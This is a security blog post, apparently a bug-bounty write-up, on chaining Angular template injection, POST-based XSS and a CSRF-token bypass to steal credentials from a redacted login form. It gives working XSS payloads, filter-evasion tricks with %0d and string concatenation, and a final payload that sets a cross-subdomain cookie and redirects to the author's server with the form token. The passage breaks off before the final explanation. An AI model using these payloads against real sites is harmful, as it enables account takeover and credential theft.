{"id":252,"date":"2022-10-25T20:41:34","date_gmt":"2022-10-25T18:41:34","guid":{"rendered":"https:\/\/bergee.it\/blog\/?p=252"},"modified":"2023-07-13T22:51:32","modified_gmt":"2023-07-13T20:51:32","slug":"chaining-multiple-vulnerabilities-for-credential-stealing","status":"publish","type":"post","link":"https:\/\/bergee.it\/blog\/chaining-multiple-vulnerabilities-for-credential-stealing\/","title":{"rendered":"Chaining multiple vulnerabilities for credential stealing"},"content":{"rendered":"

Once upon a time in far, far hackalaxy…. there was a login form built with angular. This story is about how I managed to steal credentials using Angular template injection, post-based XSS, and CSRF protection bypass. I can’t disclose the real target so I call our target redacted.com.<\/p>\n

Angular template injection<\/h3>\n

I’ve visited https:\/\/subdomain.redacted.com and Wappalizer told me it’s built with Angular 1.8.2. There is a login form on the main site which I tested against angular template injection. I put {{7*7}} as login and xxx as password and after pressing the login button I saw 49 in the login field. I had an angular template injection. Good. It was time to check for XSS. I looked around and found the following payload for Angular 1.6+.:<\/p>\n

{{constructor.constructor(‘alert(document.domain)’)()}}<\/p><\/blockquote>\n

I put it as a login, clicked the button and the alert popped up. Hurray! So far so good. But I’ve got only self-XSS. Not much useful.<\/p>\n

Bypassing CSRF – transforming self xss to post-based xss<\/h3>\n

This was a POST form so what I could try here is to get POST-based XSS. I copied the form to a local file and tried to post it but the error occurred.<\/p>\n

\"\"<\/p>\n

I noticed the RequestVerificationToken field in the form.<\/p>\n

<input name=”__RequestVerificationToken” type=”hidden” value=”wdvSsmrUEwOgqYbVXhGVM9QrRvuJ6Q1qECY0IdLheg_BZBi-nKix0KmO4Hhc3qsN7PLKR3S7_ruvTh9Zm7RCiuo2jntoBNGjkAQ0_LGj8T81″ \/><\/p><\/blockquote>\n

That was the cause of failure. The CSRF token was protecting the form. I tried several common bypasses but end up with nothing. Ok. I analyzed the POST request while submitting the form and I saw another RequestVerificationToken, this time sent as a cookie.<\/p>\n

__RequestVerificationToken_L2HvYbluXTkr:S6X0D6jm1iP_Mu7srWO2srOcPW36oxZcrc2q8j6b1Ts_PeB3wxLteCsZdWE<\/p><\/blockquote>\n

\"\"<\/p>\n

As we can see the application was built with ASP.NET. This token was different from this on the form. After some time of playing with both tokens, I figured out I need to set the form token as well as the cookie token respectively. I came up with the following scenario:<\/p>\n

1. I use PHP curl to fetch the website source code to extract both tokens from the cookie header and HTML source.
\n2. I create the form with injected stolen CSRF token (form token) and angular template payload
\n3. To set the cookie token I need XSS on some redacted.com subdomain, which will set the cookie like this:<\/p>\n

document.cookie=”__RequestVerificationToken_L2HvYbluXTkr=TOKENVALUE; path=\/; domain=.redacted.com”;<\/p><\/blockquote>\n

As site B can’t set cookies on site A, the cookie set with domain .redacted.com will be accessible from all other redacted.com subdomains – also from our target subdomain.redacted.com.
\n4. After setting the CSRF cookie with another XSS, I return to my attacking script and submit the actual form running angular XSS payload.
\n5. Spoiler: Yep it has worked \ud83d\ude00<\/p>\n

Bypassing the XSS filter to set the CSRF token cookie<\/h3>\n

I had difficulty finding valid exploitable XSS however after not so short time I found one. Let’s call it xsssubdomain.redacted.com:<\/p>\n

https:\/\/xsssubdomain.redacted.com\/somewhere\/file.cfm<\/p><\/blockquote>\n

This was also POST-based XSS, however, this time the form was not protected by a CSRF token and no WAF was in place. However, there was XSS filter protection. The form consisted of multiple parameters, I focused on the first one – address and started playing with burp requests. I noticed that I can inject some HTML content without problems:<\/p>\n

 <\/p>\n

\"\"<\/p>\n

 <\/p>\n

The h1 header rendered on the site – successfully injected HTML. Now I tried to inject an image tag, but\u00a0 I failed. There was some kind of filter in place:<\/p>\n

 <\/p>\n

\"\"<\/p>\n

 <\/p>\n

Both img tag and src attribute were cut out. Now I tried with script tag payload. The “Invalid Tag” was detected:<\/p>\n

 <\/p>\n

\"\"<\/p>\n

 <\/p>\n

I figured out the filter works in a blacklist way, removing some tags or events. So I decided to look for ones that are not blacklisted. To do that I\u00a0 copied all the tags and events to txt files from https:\/\/portswigger.net\/web-security\/cross-site-scripting\/cheat-sheet.<\/a> Then I used the great Turbo Intruder plugin<\/a> for Burp by James Kettle. I use Burp Community Edition, so the standard intruder is pretty slow there. That’s why I used the one on steroids :). I gathered all accepted tags. Then made the second round, this time looking for the events. The goal was to find such a combination of them that I could build the XSS payload. The onauxclick<\/em> event was whitelisted so I managed to build the first working payload:<\/p>\n

XXX” onauxclick=document.write(document.domain)<\/p><\/blockquote>\n

As the injection was inside the input tag, this payload required user interaction – click with the right mouse button on the input. It worked but it was not what I wanted – which means no user interaction. I was looking further and found that video tag and oncanplay event are whitelisted also. So I tried this payload:<\/p>\n

\"\"<\/p>\n

And I ended up with:<\/p>\n

\"\"<\/p>\n

Damn. The whole tag was cut out. I started playing with magical %0d,%0a, and %09 ASCII codes which are respectively CR, LF, and TAB to bypass the filter and it worked \ud83d\ude42 Putting %0d fooled the filter and what I got was:<\/p>\n

\"\"<\/p>\n

To make it work I needed the valid mp4 file as the javascript code executes if the movie can be played. I created a very short mp4 video with the tool https:\/\/clideo.com\/<\/a> and put it online, suppose here: https:\/\/myserver\/video.mp4<\/em>.\u00a0 I\u00a0 added the autoplay attribute to make the video start playing at once. Then I used the video URL in the payload and… another surprise:<\/p>\n

\"\"<\/p>\n

The HTTP part was cut out. Grrrr… Fortunately, I could write the same URL as \/\/myserver\/video.mp4<\/em>. This was not cut out, so I started to develop the final payload which was about to set the cookie:<\/p>\n

XXX”><video autoplay oncanplay%0d=%0ddocument.cookie(“__RequestVerificationToken_L2HvYbluXTkr=TOKENVALUE; domain=.redacted.com; samesite=none”)><source src%0d=”\/\/myserver\/video.mp4″ type=”video\/mp4″><\/video><!–<\/p><\/blockquote>\n

I added <– at the end of the payload which makes the exploit a bit faster. The response was pretty shocking.<\/p>\n

\"\"<\/p>\n

Where the hell is the video tag I asked myself!!!! After another long while, I figured out that the name of the cookie was the problem. This must have been some other protection filter in place. If I set the cookie name to ‘__RequestVerification’ the payload worked and the response was ok. If I only add one character to the end of the cookie name such as\u00a0 ‘__RequestVerificationX’, the <video> tag was cut out. I tried all “magic” char sequences again but nothing worked :(. After a short break from working on the problem… eureka. The “__RequestVerificationToken_L2HvYbluXTkr” string was in a javascript context – the parameter of document.cookie method, so how about string concatenation:<\/p>\n

“RequestVerification”+”Token_L2HvYbluXTkr”<\/p>\n

And guess what? It worked like a charm :). Some chars should be urlencoded into, so the final working payload was:<\/p>\n

\"\"<\/p>\n

 <\/p>\n

XXX”><\/td><video autoplay oncanplay%0d=%0d%27document.write();document.cookie=”__RequestVerification”%2b”Token_L2HvYbluXTkr=TOKENVALUE;domain=.redacted.com;path=\/;samesite=none”;document.location.href=”\/\/myserver\/POC.php?ret=1%26rvtf=FORMTOKENVALUE”%27><source src%0d=”\/\/myserver\/video.mp4″ type=”video\/mp4″><\/video><!–<\/p><\/blockquote>\n

It does the following things:<\/p>\n